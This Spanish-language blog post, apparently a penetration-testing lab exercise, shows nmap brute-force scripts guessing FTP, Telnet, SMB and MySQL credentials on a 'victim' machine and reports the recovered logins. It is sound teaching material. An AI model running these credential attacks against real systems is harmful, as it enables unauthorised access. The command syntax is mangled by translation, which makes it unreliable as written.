En la práctica anterior, había utilizado el comando básico para escanear la PC de la víctima y encontré puertos abiertos como ftp, Ssh, telnet, snmp, etc. Puede verificar desde aquí. Pero ahora la pregunta es si encontramos puertos abiertos, ¿qué más podemos hacer para recuperar la información de la víctima usando scripts nmap? Para saber su respuesta, lea con anticipación.
FTP BRUTE
Descifra la contraseña usando el script nmap bruto de FTP.
nmap -p21 –script ftp-brute.nse –script-args
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
Del resultado del escaneo obtuve con éxito la contraseña FTP de la PC víctima
msfadmin: msfadmin como nombre de usuario y contraseña.
BRUTO TELNET
Descifra la contraseña usando nmap brute script de telnet.
nmap -p23 –script telnet-brute.nse –script-args
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
Obtuve con éxito la contraseña de TELNET de la PC de la víctima msfadmin: msfadmin como
nombre de usuario y contraseña.
SMB BRUTE
Descifra la contraseña usando el script nmap brute de SMB
Nmap –p445 –script smb-brute.nse –script-args
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
Obtuve con éxito la contraseña SMB de la PC víctima msfadmin: msfadmin y usuario: usuario como nombre de usuario y contraseña.
BRUTO MYSQL
Descifra la contraseña usando la secuencia de comandos bruta nmap del servidor MYSQL
Aquí encontré dos usuarios como root e invitados con contraseña vacía para el servidor MySQL
No hay comentarios:
Publicar un comentario